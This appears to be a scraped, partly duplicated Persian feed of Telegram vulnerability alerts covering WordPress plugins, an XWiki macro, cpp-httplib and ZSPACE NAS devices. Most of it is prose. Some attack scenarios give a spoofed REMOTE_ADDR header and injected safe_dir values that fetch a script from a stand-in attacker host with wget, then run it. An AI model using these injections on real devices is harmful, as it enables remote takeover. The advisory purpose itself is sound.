🚨 New Vulnerability Alert: CVE-2025-12851
🟠 Risk Level: HIGH (Score: 8.1)
📝 توضیحات آسیبپذیری:
آسیبپذیری با شناسه
این ضعف امنیتی تمامی نسخههای این پلاگین تا نسخه 3.6.32 (و خود این نسخه) را تحت تاثیر قرار میدهد. مشکل اصلی در پارامتر
💥 تاثیرات:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به نتایج خطرناکی شود، از جمله:
- اجرای کد از راه دور (RCE): اگر مهاجم بتواند فایلی حاوی کدهای PHP (حتی یک فایل تصویر دستکاریشده) را روی سرور آپلود کند، میتواند با فراخوانی آن از طریق این آسیبپذیری، کنترل کامل وبسایت را به دست بگیرد.
- سرقت اطلاعات حساس: مهاجم قادر به خواندن فایلهای حساس سرور خواهد بود، مانند فایل
- دور زدن کنترلهای دسترسی: این آسیبپذیری میتواند برای دور زدن مکانیزمهای امنیتی و دسترسی به بخشهای مدیریتی یا محدود شده استفاده شود.
🎭 سناریوی حمله:
یک مهاجم ابتدا یک وبسایت را که از نسخه آسیبپذیر پلاگین
در مرحله اول، مهاجم با ارسال یک درخواست دستکاریشده به پارامتر
در یک سناریوی پیشرفتهتر، مهاجم ابتدا یک فایل به ظاهر بیخطر (مانند یک تصویر آواتار) که حاوی کدهای مخرب PHP است را در قسمتی از وبسایت آپلود میکند. سپس با استفاده از همین آسیبپذیری LFI، مسیر آن فایل آپلود شده را در پارامتر
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.1)
📝 توضیحات آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-12851 از نوع گنجاندن فایل محلی یا Local File Inclusion (LFI) در پلاگین وردپرسی My auctions allegro شناسایی شده است.این ضعف امنیتی تمامی نسخههای این پلاگین تا نسخه 3.6.32 (و خود این نسخه) را تحت تاثیر قرار میدهد. مشکل اصلی در پارامتر
controller نهفته است که به مهاجمان بدون نیاز به احراز هویت اجازه میدهد تا فایلهای دلخواه موجود بر روی سرور را فراخوانی و محتوای آنها را اجرا کنند.💥 تاثیرات:
موفقیت در بهرهبرداری از این آسیبپذیری میتواند منجر به نتایج خطرناکی شود، از جمله:
- اجرای کد از راه دور (RCE): اگر مهاجم بتواند فایلی حاوی کدهای PHP (حتی یک فایل تصویر دستکاریشده) را روی سرور آپلود کند، میتواند با فراخوانی آن از طریق این آسیبپذیری، کنترل کامل وبسایت را به دست بگیرد.
- سرقت اطلاعات حساس: مهاجم قادر به خواندن فایلهای حساس سرور خواهد بود، مانند فایل
wp-config.php که حاوی اطلاعات اتصال به پایگاه داده است، یا سایر فایلهای سیستمی.- دور زدن کنترلهای دسترسی: این آسیبپذیری میتواند برای دور زدن مکانیزمهای امنیتی و دسترسی به بخشهای مدیریتی یا محدود شده استفاده شود.
🎭 سناریوی حمله:
یک مهاجم ابتدا یک وبسایت را که از نسخه آسیبپذیر پلاگین
My auctions allegro استفاده میکند، شناسایی میکند.در مرحله اول، مهاجم با ارسال یک درخواست دستکاریشده به پارامتر
controller، سعی میکند یک فایل حساس مانند /etc/passwd را بخواند تا اطلاعاتی درباره کاربران سیستمعامل سرور به دست آورد.در یک سناریوی پیشرفتهتر، مهاجم ابتدا یک فایل به ظاهر بیخطر (مانند یک تصویر آواتار) که حاوی کدهای مخرب PHP است را در قسمتی از وبسایت آپلود میکند. سپس با استفاده از همین آسیبپذیری LFI، مسیر آن فایل آپلود شده را در پارامتر
controller قرار داده و آن را فراخوانی میکند. این عمل باعث اجرای کدهای مخرب PHP و دستیابی به اجرای کد از راه دور (RCE) بر روی سرور هدف میشود.---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-12879
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری: CVE-2025-12879
افزونه وردپرس: User Generator and Importer
---
Vulnerability Description:
آسیبپذیری از نوع Cross-Site Request Forgery (CSRF) در افزونه
این نقص به مهاجمان اجازه میدهد تا درخواستهای جعلی را از طرف یک مدیر احراز هویت شده به وبسایت ارسال کنند.
Impact:
مهاجم غیر احراز هویت شده میتواند با سوءاستفاده از این آسیبپذیری، یک حساب کاربری جدید با بالاترین سطح دسترسی (Administrator) بر روی وبسایت هدف ایجاد کند. این امر به معنای در اختیار گرفتن کامل کنترل وبسایت، دسترسی به تمام اطلاعات کاربران، و امکان اجرای کدهای مخرب بر روی سرور است.
به طور خلاصه، این آسیبپذیری میتواند منجر به تسخیر کامل وبسایت (Full Site Compromise) شود.
Scenario:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک صفحه وب یا لینک مخرب را آماده میکند که حاوی یک فرم جعلی برای ارسال درخواست به تابع آسیبپذیر در افزونه است. این فرم دستور ایجاد یک کاربر جدید با نام کاربری و رمز عبور دلخواه و سطح دسترسی
۲. مهاجم با استفاده از روشهای مهندسی اجتماعی (مانند ارسال ایمیل فیشینگ یا پیام در شبکههای اجتماعی)، مدیر وبسایت را ترغیب میکند تا بر روی لینک مخرب کلیک کند.
۳. زمانی که مدیر (که در همان مرورگر به پنل مدیریت وردپرس خود وارد شده است) روی لینک کلیک میکند، مرورگر او به صورت خودکار و پنهانی، درخواست جعلی را به همراه کوکیهای احراز هویت به وبسایت ارسال میکند.
۴. از آنجایی که افزونه فاقد مکانیزم دفاعی CSRF (بررسی Nonce) است، درخواست را معتبر تلقی کرده و یک حساب کاربری جدید با دسترسی کامل مدیر برای مهاجم ایجاد میکند، بدون اینکه مدیر وبسایت متوجه این فرآیند شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری: CVE-2025-12879
افزونه وردپرس: User Generator and Importer
---
Vulnerability Description:
آسیبپذیری از نوع Cross-Site Request Forgery (CSRF) در افزونه
User Generator and Importer برای وردپرس شناسایی شده است. این ضعف امنیتی نسخههای 1.2.2 و پایینتر را تحت تأثیر قرار میدهد. مشکل اصلی ناشی از عدم وجود اعتبارسنجی توکنهای امنیتی (Nonce) در عملکرد "Import Using CSV File" است.این نقص به مهاجمان اجازه میدهد تا درخواستهای جعلی را از طرف یک مدیر احراز هویت شده به وبسایت ارسال کنند.
Impact:
مهاجم غیر احراز هویت شده میتواند با سوءاستفاده از این آسیبپذیری، یک حساب کاربری جدید با بالاترین سطح دسترسی (Administrator) بر روی وبسایت هدف ایجاد کند. این امر به معنای در اختیار گرفتن کامل کنترل وبسایت، دسترسی به تمام اطلاعات کاربران، و امکان اجرای کدهای مخرب بر روی سرور است.
به طور خلاصه، این آسیبپذیری میتواند منجر به تسخیر کامل وبسایت (Full Site Compromise) شود.
Scenario:
یک سناریوی حمله محتمل به شرح زیر است:
۱. مهاجم یک صفحه وب یا لینک مخرب را آماده میکند که حاوی یک فرم جعلی برای ارسال درخواست به تابع آسیبپذیر در افزونه است. این فرم دستور ایجاد یک کاربر جدید با نام کاربری و رمز عبور دلخواه و سطح دسترسی
administrator را در خود جای داده است.۲. مهاجم با استفاده از روشهای مهندسی اجتماعی (مانند ارسال ایمیل فیشینگ یا پیام در شبکههای اجتماعی)، مدیر وبسایت را ترغیب میکند تا بر روی لینک مخرب کلیک کند.
۳. زمانی که مدیر (که در همان مرورگر به پنل مدیریت وردپرس خود وارد شده است) روی لینک کلیک میکند، مرورگر او به صورت خودکار و پنهانی، درخواست جعلی را به همراه کوکیهای احراز هویت به وبسایت ارسال میکند.
۴. از آنجایی که افزونه فاقد مکانیزم دفاعی CSRF (بررسی Nonce) است، درخواست را معتبر تلقی کرده و یک حساب کاربری جدید با دسترسی کامل مدیر برای مهاجم ایجاد میکند، بدون اینکه مدیر وبسایت متوجه این فرآیند شود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-65036
🟠 Risk Level: HIGH (Score: 8.3)
شرح آسیبپذیری:
آسیبپذیری با شناسه
نقطه ضعف اصلی در این است که ماکروی مربوطه، کدهای نوشته شده با زبان قالب (Template Language) به نام
نسخههای تحت تاثیر: تمامی نسخهها قبل از
نسخه اصلاح شده:
---
تاثیرات:
تاثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این آسیبپذیری به مهاجم اجازه میدهد تا دستورات دلخواه خود را بر روی سروری که XWiki روی آن میزبانی میشود، اجرا کند.
عواقب احتمالی این حمله عبارتند از:
- کنترل کامل سرور: مهاجم میتواند کنترل کامل سرور را در دست بگیرد.
- سرقت اطلاعات حساس: دسترسی به پایگاه داده، فایلهای پیکربندی و اطلاعات محرمانه کاربران.
- نصب بدافزار: امکان نصب بدافزار، باجافزار یا ابزارهای جاسوسی بر روی سرور.
- حملات بعدی: استفاده از سرور قربانی به عنوان پایگاهی برای حمله به سایر سیستمها در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند از این آسیبپذیری به شرح زیر بهرهبرداری کند:
۱. ابتدا، مهاجم یک نمونه XWiki را که از نسخه آسیبپذیر افزونه Remote Macros استفاده میکند، شناسایی میکند.
۲. سپس، مهاجم (حتی با یک حساب کاربری با سطح دسترسی پایین یا به عنوان کاربر مهمان در صورت پیکربندی نادرست) یک صفحه جدید ایجاد کرده یا یک صفحه موجود را ویرایش میکند.
۳. در این صفحه، مهاجم یک ماکروی آسیبپذیر را قرار داده و در پارامترهای آن یا در صفحه جزئیات مرتبط با آن، یک قطعه کد
۴. هنگامی که این صفحه توسط هر کاربری (یا خود مهاجم) مشاهده و رندر میشود، ماکروی آسیبپذیر بدون هیچگونه بررسی امنیتی، کد
۵. در نتیجه، دستور مخرب بر روی سرور با سطح دسترسی پروسه XWiki اجرا شده و مهاجم به سرور نفوذ میکند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.3)
شرح آسیبپذیری:
آسیبپذیری با شناسه
CVE-2025-65036 در افزونه Remote Macros پلتفرم XWiki شناسایی شده است. این افزونه که برای انتقال محتوا از Confluence به XWiki استفاده میشود، دارای یک نقص امنیتی حیاتی است.نقطه ضعف اصلی در این است که ماکروی مربوطه، کدهای نوشته شده با زبان قالب (Template Language) به نام
Velocity را بدون بررسی سطح دسترسی کاربر اجرا میکند. این بدان معناست که یک کاربر غیرمجاز میتواند با تزریق کد مخرب در صفحات جزئیات (details pages)، آن را بر روی سرور اجرا کند.نسخههای تحت تاثیر: تمامی نسخهها قبل از
1.27.1نسخه اصلاح شده:
1.27.1---
تاثیرات:
تاثیر اصلی این آسیبپذیری، اجرای کد از راه دور (Remote Code Execution - RCE) است. این آسیبپذیری به مهاجم اجازه میدهد تا دستورات دلخواه خود را بر روی سروری که XWiki روی آن میزبانی میشود، اجرا کند.
عواقب احتمالی این حمله عبارتند از:
- کنترل کامل سرور: مهاجم میتواند کنترل کامل سرور را در دست بگیرد.
- سرقت اطلاعات حساس: دسترسی به پایگاه داده، فایلهای پیکربندی و اطلاعات محرمانه کاربران.
- نصب بدافزار: امکان نصب بدافزار، باجافزار یا ابزارهای جاسوسی بر روی سرور.
- حملات بعدی: استفاده از سرور قربانی به عنوان پایگاهی برای حمله به سایر سیستمها در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند از این آسیبپذیری به شرح زیر بهرهبرداری کند:
۱. ابتدا، مهاجم یک نمونه XWiki را که از نسخه آسیبپذیر افزونه Remote Macros استفاده میکند، شناسایی میکند.
۲. سپس، مهاجم (حتی با یک حساب کاربری با سطح دسترسی پایین یا به عنوان کاربر مهمان در صورت پیکربندی نادرست) یک صفحه جدید ایجاد کرده یا یک صفحه موجود را ویرایش میکند.
۳. در این صفحه، مهاجم یک ماکروی آسیبپذیر را قرار داده و در پارامترهای آن یا در صفحه جزئیات مرتبط با آن، یک قطعه کد
Velocity مخرب تزریق میکند. این کد برای اجرای یک دستور سیستمی طراحی شده است. برای مثال، کدی که یک reverse shell به سرور مهاجم برقرار میکند.۴. هنگامی که این صفحه توسط هر کاربری (یا خود مهاجم) مشاهده و رندر میشود، ماکروی آسیبپذیر بدون هیچگونه بررسی امنیتی، کد
Velocity تزریق شده را اجرا میکند.۵. در نتیجه، دستور مخرب بر روی سرور با سطح دسترسی پروسه XWiki اجرا شده و مهاجم به سرور نفوذ میکند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66570
🔴 Risk Level: CRITICAL (Score: 10.0)
تحلیل آسیبپذیری CVE-2025-66570 در کتابخانه cpp-httplib
📝 توصیف آسیبپذیری:
یک آسیبپذیری از نوع تزریق هدر (Header Injection) در کتابخانه C++ به نام
این مشکل زمانی رخ میدهد که کتابخانه ابتدا هدرهای ارسالی توسط مهاجم را پردازش کرده و سپس بدون حذف مقادیر تکراری، اطلاعات صحیح و داخلی خود را با همین نامها به لیست هدرها اضافه میکند. از آنجایی که توابع مربوطه مانند
💥 تأثیرات:
این آسیبپذیری میتواند منجر به چندین تهدید امنیتی جدی شود:
🔸 جعل آدرس IP (IP Spoofing): مهاجم میتواند سرور را فریب دهد تا تصور کند درخواست از یک آدرس IP معتبر یا داخلی (مانند
🔸 دور زدن مکانیزمهای امنیتی (Authorization Bypass): اگر سیستمهای کنترل دسترسی یا فایروال برنامه کاربردی (WAF) بر اساس آدرس IP کاربر تصمیمگیری کنند، مهاجم با جعل یک IP مجاز میتواند این محدودیتها را دور بزند.
🔸 مسمومسازی لاگها (Log Poisoning): مهاجم میتواند اطلاعات نادرست و گمراهکننده را در لاگهای سرور ثبت کند. این کار تحلیل امنیتی و ردیابی فعالیتهای مخرب را بسیار دشوار میسازد و ممکن است باعث پنهان ماندن حملات دیگر شود.
🎭 سناریو حمله:
فرض کنید یک وب اپلیکیشن با استفاده از نسخه آسیبپذیر
1. مهاجم یک درخواست HTTP به سمت سرور ارسال میکند.
2. در این درخواست، هدر زیر را به صورت دستی اضافه میکند:
3. سرور درخواست را دریافت میکند. ابتدا هدر جعلی مهاجم را پردازش میکند و سپس آدرس IP واقعی مهاجم را (مثلاً
4. اپلیکیشن برای بررسی دسترسی، آدرس IP کاربر را با تابع
5. این تابع اولین مقدار، یعنی
6. در نتیجه، سیستم کنترل دسترسی تصور میکند که درخواست از یک منبع داخلی و معتبر آمده و به مهاجم اجازه ورود به پنل مدیریت را میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 10.0)
تحلیل آسیبپذیری CVE-2025-66570 در کتابخانه cpp-httplib
📝 توصیف آسیبپذیری:
یک آسیبپذیری از نوع تزریق هدر (Header Injection) در کتابخانه C++ به نام
cpp-httplib (نسخههای قبل از 0.27.0) شناسایی شده است. مهاجم میتواند با ارسال هدرهای HTTP خاصی مانند REMOTE_ADDR، REMOTE_PORT، LOCAL_ADDR و LOCAL_PORT در درخواست خود، اطلاعات متادیتای سرور را دستکاری کند.این مشکل زمانی رخ میدهد که کتابخانه ابتدا هدرهای ارسالی توسط مهاجم را پردازش کرده و سپس بدون حذف مقادیر تکراری، اطلاعات صحیح و داخلی خود را با همین نامها به لیست هدرها اضافه میکند. از آنجایی که توابع مربوطه مانند
get_header_value اولین مقدار پیدا شده برای یک هدر را برمیگردانند، مقدار جعلی تزریق شده توسط مهاجم به جای مقدار واقعی و معتبر سرور مورد استفاده قرار میگیرد. این تکنیک به Header Shadowing معروف است.💥 تأثیرات:
این آسیبپذیری میتواند منجر به چندین تهدید امنیتی جدی شود:
🔸 جعل آدرس IP (IP Spoofing): مهاجم میتواند سرور را فریب دهد تا تصور کند درخواست از یک آدرس IP معتبر یا داخلی (مانند
127.0.0.1) ارسال شده است، در حالی که منبع واقعی درخواست جای دیگری است.🔸 دور زدن مکانیزمهای امنیتی (Authorization Bypass): اگر سیستمهای کنترل دسترسی یا فایروال برنامه کاربردی (WAF) بر اساس آدرس IP کاربر تصمیمگیری کنند، مهاجم با جعل یک IP مجاز میتواند این محدودیتها را دور بزند.
🔸 مسمومسازی لاگها (Log Poisoning): مهاجم میتواند اطلاعات نادرست و گمراهکننده را در لاگهای سرور ثبت کند. این کار تحلیل امنیتی و ردیابی فعالیتهای مخرب را بسیار دشوار میسازد و ممکن است باعث پنهان ماندن حملات دیگر شود.
🎭 سناریو حمله:
فرض کنید یک وب اپلیکیشن با استفاده از نسخه آسیبپذیر
cpp-httplib ساخته شده و یک پنل مدیریت دارد که دسترسی به آن فقط برای آدرس IP محلی (127.0.0.1) مجاز است.1. مهاجم یک درخواست HTTP به سمت سرور ارسال میکند.
2. در این درخواست، هدر زیر را به صورت دستی اضافه میکند:
REMOTE_ADDR: 127.0.0.13. سرور درخواست را دریافت میکند. ابتدا هدر جعلی مهاجم را پردازش میکند و سپس آدرس IP واقعی مهاجم را (مثلاً
198.51.100.10) با همین نام هدر به لیست اضافه میکند.4. اپلیکیشن برای بررسی دسترسی، آدرس IP کاربر را با تابع
get_header_value("REMOTE_ADDR") استعلام میکند.5. این تابع اولین مقدار، یعنی
127.0.0.1 را که توسط مهاجم تزریق شده، برمیگرداند.6. در نتیجه، سیستم کنترل دسترسی تصور میکند که درخواست از یک منبع داخلی و معتبر آمده و به مهاجم اجازه ورود به پنل مدیریت را میدهد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14106
🟠 Risk Level: HIGH (Score: 8.8)
📜 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع تزریق دستور (Command Injection) با شناسه
این ضعف امنیتی در تابع
💥 تأثیر:
مهاجمی که از این آسیبپذیری بهرهبرداری کند، میتواند به طور کامل کنترل دستگاه را در دست بگیرد. این حمله به صورت از راه دور و بدون نیاز به احراز هویت قابل اجرا است.
پیامدهای اصلی عبارتند از:
• اجرای کد از راه دور (RCE) و دسترسی کامل به سیستم.
• سرقت، حذف یا رمزنگاری تمامی دادههای ذخیره شده بر روی دستگاه.
• نصب بدافزار (مانند باجافزار یا تروجان) بر روی دستگاه.
• استفاده از دستگاه به عنوان نقطهای برای نفوذ به سایر سیستمهای موجود در شبکه داخلی (Pivoting).
🎭 سناریو حمله:
۱. مهاجم یک دستگاه ZSPACE Q2C آسیبپذیر را در اینترنت یا شبکه داخلی شناسایی میکند.
۲. سپس، یک درخواست HTTP POST دستکاریشده به آدرس زیر ارسال میکند:
۳. در بدنه این درخواست، مقدار پارامتر
۴. وب سرور دستگاه، این ورودی را بدون اعتبارسنجی دریافت کرده و دستورات تزریق شده توسط مهاجم را با سطح دسترسی خود اجرا میکند. در نتیجه، مهاجم موفق به اجرای کد از راه دور و به دست گرفتن کنترل دستگاه میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
📜 شرح آسیبپذیری:
یک آسیبپذیری حیاتی از نوع تزریق دستور (Command Injection) با شناسه
CVE-2025-14106 در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است.این ضعف امنیتی در تابع
zfilev2_api.CloseSafe واقع در مسیر /v2/file/safe/close وجود دارد. مهاجم از راه دور میتواند با ارسال یک درخواست HTTP POST و دستکاری پارامتر safe_dir، دستورات دلخواه خود را بر روی سیستم عامل دستگاه اجرا کند. اکسپلویت این آسیبپذیری به صورت عمومی منتشر شده و فروشنده محصول هیچ پاسخی جهت رفع آن ارائه نکرده است.💥 تأثیر:
مهاجمی که از این آسیبپذیری بهرهبرداری کند، میتواند به طور کامل کنترل دستگاه را در دست بگیرد. این حمله به صورت از راه دور و بدون نیاز به احراز هویت قابل اجرا است.
پیامدهای اصلی عبارتند از:
• اجرای کد از راه دور (RCE) و دسترسی کامل به سیستم.
• سرقت، حذف یا رمزنگاری تمامی دادههای ذخیره شده بر روی دستگاه.
• نصب بدافزار (مانند باجافزار یا تروجان) بر روی دستگاه.
• استفاده از دستگاه به عنوان نقطهای برای نفوذ به سایر سیستمهای موجود در شبکه داخلی (Pivoting).
🎭 سناریو حمله:
۱. مهاجم یک دستگاه ZSPACE Q2C آسیبپذیر را در اینترنت یا شبکه داخلی شناسایی میکند.
۲. سپس، یک درخواست HTTP POST دستکاریشده به آدرس زیر ارسال میکند:
https://[TARGET_IP]/v2/file/safe/close۳. در بدنه این درخواست، مقدار پارامتر
safe_dir با دستورات مخرب سیستمعامل ترکیب میشود. برای مثال، برای دانلود و اجرای یک اسکریپت مخرب، مهاجم میتواند مقداری شبیه به این را ارسال کند:{"safe_dir": "; wget https://malicious.server/payload -O /tmp/p; chmod +x /tmp/p; /tmp/p"}۴. وب سرور دستگاه، این ورودی را بدون اعتبارسنجی دریافت کرده و دستورات تزریق شده توسط مهاجم را با سطح دسترسی خود اجرا میکند. در نتیجه، مهاجم موفق به اجرای کد از راه دور و به دست گرفتن کنترل دستگاه میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14107
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری | هشدار امنیتی
شناسه:
---
📄 شرح آسیبپذیری:
یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه
این آسیبپذیری در تابع
حمله به صورت از راه دور قابل اجرا بوده و کد بهرهبرداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.
💥 سطح تأثیر:
تأثیر این آسیبپذیری بسیار بالا (Critical) ارزیابی میشود. بهرهبرداری موفقیتآمیز میتواند منجر به موارد زیر گردد:
- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخشهای شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.
🎭 سناریوی حمله:
۱. مهاجم با استفاده از ابزارهای اسکن، دستگاههای ZSPACE Q2C آسیبپذیر که در اینترنت قابل دسترس هستند را شناسایی میکند.
۲. سپس یک درخواست
۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریقشده را مستقیماً بر روی سیستمعامل اجرا میکند.
۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری | هشدار امنیتی
شناسه:
CVE-2025-14107---
📄 شرح آسیبپذیری:
یک ضعف امنیتی حیاتی از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل ZSPACE Q2C تا نسخه
1.1.0210050 شناسایی شده است.این آسیبپذیری در تابع
zfilev2_api.SafeStatus که از طریق ارسال درخواست HTTP POST به مسیر /v2/file/safe/status قابل دسترس است، وجود دارد. مهاجم میتواند با دستکاری پارامتر safe_dir و تزریق دستورات مخرب، کنترل کامل سیستمعامل دستگاه را به دست گیرد.حمله به صورت از راه دور قابل اجرا بوده و کد بهرهبرداری (Exploit) آن به صورت عمومی منتشر شده است. شرکت سازنده به هشدارهای امنیتی پاسخی نداده و در حال حاضر هیچ وصله امنیتی برای این مورد منتشر نشده است.
💥 سطح تأثیر:
تأثیر این آسیبپذیری بسیار بالا (Critical) ارزیابی میشود. بهرهبرداری موفقیتآمیز میتواند منجر به موارد زیر گردد:
- اجرای دستورات دلخواه از راه دور با بالاترین سطح دسترسی (root).
- سرقت، حذف و یا رمزنگاری تمامی اطلاعات ذخیره شده بر روی دستگاه.
- کنترل کامل دستگاه و استفاده از آن برای نفوذ به سایر بخشهای شبکه داخلی (Pivoting).
- تبدیل دستگاه به بخشی از یک شبکه مخرب (Botnet) برای انجام حملات دیگر.
🎭 سناریوی حمله:
۱. مهاجم با استفاده از ابزارهای اسکن، دستگاههای ZSPACE Q2C آسیبپذیر که در اینترنت قابل دسترس هستند را شناسایی میکند.
۲. سپس یک درخواست
HTTP POST دستکاریشده به سرور NAS ارسال میکند. در این درخواست، پارامتر safe_dir حاوی دستورات مخرب سیستمعامل است (برای مثال، دستوری برای دانلود و اجرای یک درب پشتی یا Backdoor).۳. وب سرور دستگاه بدون اعتبارسنجی ورودی، دستور تزریقشده را مستقیماً بر روی سیستمعامل اجرا میکند.
۴. در نتیجه، مهاجم به دستگاه نفوذ کرده و کنترل کامل آن را برای سرقت اطلاعات یا اجرای حملات بعدی به دست میآورد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-14108
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14108
توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل
مهاجم از راه دور میتواند با دستکاری پارامتر
---
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسهی وب سرور دستگاه میدهد. این موضوع میتواند منجر به نتایج فاجعهباری شود، از جمله:
- کنترل کامل دستگاه و دسترسی به تمامی فایلهای ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باجافزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسیهای آتی.
- استفاده از دستگاه آلوده به عنوان نقطهای برای نفوذ و حمله به سایر دستگاههای موجود در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند با دنبال کردن مراحل زیر از این آسیبپذیری بهرهبرداری کند:
۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاههای
۲. سپس، یک درخواست
۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا میکند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS میشود.
۴. در نهایت، مهاجم از طریق شل ایجاد شده، کنترل کامل دستگاه را در دست گرفته و میتواند اقدامات خرابکارانه خود را آغاز کند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
گزارش تحلیل آسیبپذیری: CVE-2025-14108
توضیحات آسیبپذیری:
یک آسیبپذیری از نوع تزریق دستور (Command Injection) در دستگاههای ذخیرهسازی تحت شبکه (NAS) مدل
ZSPACE Q2C تا نسخه 1.1.0210050 شناسایی شده است. این ضعف امنیتی در تابع zfilev2_api.OpenSafe واقع در مسیر /v2/file/safe/open وجود دارد که از طریق درخواستهای HTTP POST قابل دسترسی است.مهاجم از راه دور میتواند با دستکاری پارامتر
safe_dir، دستورات دلخواه خود را بر روی سیستمعامل دستگاه هدف اجرا کند. کد بهرهبرداری (Exploit) برای این آسیبپذیری به صورت عمومی منتشر شده و فروشنده محصول علیرغم اطلاعرسانی، هیچ واکنشی نشان نداده است.---
تاثیرات:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه اجرای کد از راه دور (Remote Code Execution - RCE) را با سطح دسترسی پروسهی وب سرور دستگاه میدهد. این موضوع میتواند منجر به نتایج فاجعهباری شود، از جمله:
- کنترل کامل دستگاه و دسترسی به تمامی فایلهای ذخیره شده.
- سرقت و استخراج اطلاعات حساس و محرمانه کاربران.
- نصب بدافزار، باجافزار (Ransomware) یا ایجاد درهای پشتی (Backdoor) برای دسترسیهای آتی.
- استفاده از دستگاه آلوده به عنوان نقطهای برای نفوذ و حمله به سایر دستگاههای موجود در شبکه داخلی.
---
سناریوی حمله:
یک مهاجم میتواند با دنبال کردن مراحل زیر از این آسیبپذیری بهرهبرداری کند:
۱. ابتدا، مهاجم با استفاده از اسکنرهای اینترنتی، دستگاههای
ZSPACE Q2C NAS آسیبپذیر را که به صورت عمومی در دسترس هستند، شناسایی میکند.۲. سپس، یک درخواست
HTTP POST مخرب به اندپوینت /v2/file/safe/open ارسال میکند. در این درخواست، مقدار پارامتر safe_dir به گونهای دستکاری میشود که شامل دستورات سیستمعامل باشد. برای مثال:safe_dir=any_directory_name; wget https://attacker.com/shell.sh -O /tmp/shell.sh; chmod +x /tmp/shell.sh; /tmp/shell.sh۳. وب سرور دستگاه بدون اعتبارسنجی کافی، این ورودی را پردازش کرده و دستورات تزریق شده توسط مهاجم را بر روی سیستم اجرا میکند. این عمل منجر به دانلود و اجرای یک شل مخرب بر روی دستگاه NAS میشود.
